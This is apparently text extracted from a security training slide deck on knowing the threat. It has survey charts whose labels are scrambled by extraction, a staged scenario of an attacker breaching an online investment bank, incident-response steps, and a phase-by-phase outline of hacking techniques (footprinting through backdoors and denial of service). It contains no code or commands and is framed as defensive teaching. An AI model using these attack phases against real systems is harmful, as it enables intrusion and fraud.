Lesson 5

Knowing the Threat

0

10

20

30

40

50

60

70

Yes No Don'tKnow

19961997199819992000

Unauthorized use of Computer Systems

2000 CSI/FBI Survey

Tren

d

0

10

20

30

40

50

60

InternalSystems

RemoteDial-In

Internet

19961997199819992000

Frequency Point of Attack2000 CSI/FBI Survey

TrendTrend

0102030405060708090

For

eign

Gov

ernm

ents

For

eign

Cor

pora

tion

s

Inde

pend

ent

Hac

kers

U.S

.C

pmpe

tito

rs

Dis

grun

tled

Em

ploy

ees

1997199819992000

Foreign Corporations

U.S. Corporations

Likely Sources of Attack

2000 CSI/FBI Survey

E-Commerce Security Example

Breaking an E-Business

WEB Server

DBA Server

Router

Investment App servers

Network

User Clients

Email Server

Consider this Network

How Can A Hacker Attack?

ATTACKER

WEB Server

DBA Server

Router

Investment App servers

Network

User Clients

Email Server

Step 1: Attackerexploits weakness inCGI script to break throughfirewall and gain shell privileges on host

ATTACKER

WEB Server

DBA Server

Router

Investment App servers

Network

User Clients

Email Server

Step 1: Attackerexploits weakness inCGI script to break throughfirewall and gain shell privileges on host

Step 2: Attacker findsdBase PW in CGI Scriptand downloads allaccount numbers and PWs

ATTACKER

WEB Server

DBA Server

Router

Investment App servers

Network

User Clients

Email Server

Step 1: Attackerexploits weakness inCGI script to break throughfirewall and gain shell privileges on host

Step 2: Attacker findsdBase PW in CGI Scriptand downloads allaccount numbers and PWs

Step 3: Attacker installsNetBus and controlsmanager’s terminal

Going for the Kill!

Customer Entersaccount ID and PW

Customer is Authenticated andaccess is granted

Customer Checksportfolio performance

Customer updatesportfolio trackingpreferences

Customer buys/sellsshares

Step 4: Attacker creditsaccount under their control

Investment bank debits/creditscustomer’s cash accountand updates portfolios

Investment bank notifiescustomer with confirmationof transaction

So What Happens When Computer Security Fails?

Incident Response--A Six Step Process– Preparation: Proactive Computer Security– Identification– Containment– Eradication– Recovery– Hot Wash

History LessonThe Art of War, Sun Tzu

Lesson for youKnow the enemyKnow yourself…and in a 100 battles

you will never be defeatedIf ignorant both of your enemy and of

yourself you are certain in every battle to be in peril

History LessonThe Art of War, Sun Tzu

Lesson for the HackerProbe him and learn where his strength

is abundant and where deficientTo subdue the enemy without fighting

is the acme of skillOne able to gain victory by modifying

his tactics IAW with enemy situation may be said to be divine

Hacker Attacks

Intent is for you to know your enemyNot intended to make you a hackerNeed to know defensive techniquesNeed to know where to start recovery

processNeed to assess extent of

investigative environment

Anatomy of a Hack

FOOTPRINTING SCANNING ENUMERATION

GAINING ACCESS ESCALATINGPRIVILEGE

PILFERING

COVERING TRACKS

CREATING BACKDOORSDENIAL

OF SERVICE

Source: Hacking Exposed, McClure, Sacmbray, and Kurtz

Anatomy of The Hack

FOOTPRINTING SCANNING ENUMERATION

GAINING ACCESS ESCALATINGPRIVILEGE

PILFERING

COVERING TRACKS

CREATING BACKDOORSDENIAL

OF SERVICE

Source: Hacking Exposed, McClure, Sacmbray, and Kurtz

Footprinting

Objective Target Address

Range Acquire

Namespace Information

Gathering Surgical Attack Don’t Miss Details

Technique Open Source

Search whois Web Interface to

whois ARIN whois DNS Zone Transfer

Source: Hacking Exposed, McClure, Sacmbray, and Kurtz

Scanning

Objective Bulk target

assessment Determine

Listening Services

Focus attack vector

Technique Ping Sweep TCP/UDP Scan OS Detection

Source: Hacking Exposed, McClure, Sacmbray, and Kurtz

Enumeration

Objective Intrusive Probing

Commences Identify valid

accounts Identify poorly

protected shares

Technique List user accounts List file shares Identify

applications

Source: Hacking Exposed, McClure, Sacmbray, and Kurtz

Gaining Access

Objective Informed attempt

to access target

Typically User level access

Technique Password sniffing File share brute

forcing Password file grab Buffer overflows

Source: Hacking Exposed, McClure, Sacmbray, and Kurtz

Escalating Privilege

Objective Gain Root level

access

Technique Password cracking

Known exploits

Source: Hacking Exposed, McClure, Sacmbray, and Kurtz

Pilfering

Objective Info gathering to

access trusted systems

Technique Evaluate trusts

Search for cleartext passwords

Source: Hacking Exposed, McClure, Sacmbray, and Kurtz

Cover Tracks

Objective Ensure highest

access

Hide access from system administrator or owner

Technique Clear logs

Hide tools

Source: Hacking Exposed, McClure, Sacmbray, and Kurtz

Creating Back Doors

Objective Deploy trap

doors

Ensure easy return access

Technique Create rogue user

accounts Schedule batch jobs Infect startup files Plant remote control

services Install monitors Trojanize

Source: Hacking Exposed, McClure, Sacmbray, and Kurtz

Denial of Service

Objective If unable to

escalate privilege then kill

Build DDOS network

Technique SYN Flood ICMP Attacks Identical src/dst

SYN requests Out of bounds TCP

options DDOS

Source: Hacking Exposed, McClure, Sacmbray, and Kurtz

Hacker Exploits per SANS

RECONNAISSANCE SCANNING

EXPLOIT SYSTEMS KEEPING ACCESS

COVERTRACKS

Source: SANs Institute

Hacking Summary

Hacking on the riseHacktivismNew crime vectorLoose international laws

Tools automated and readily availableBlended Threats

Multi-axis attacksAutomated Zombies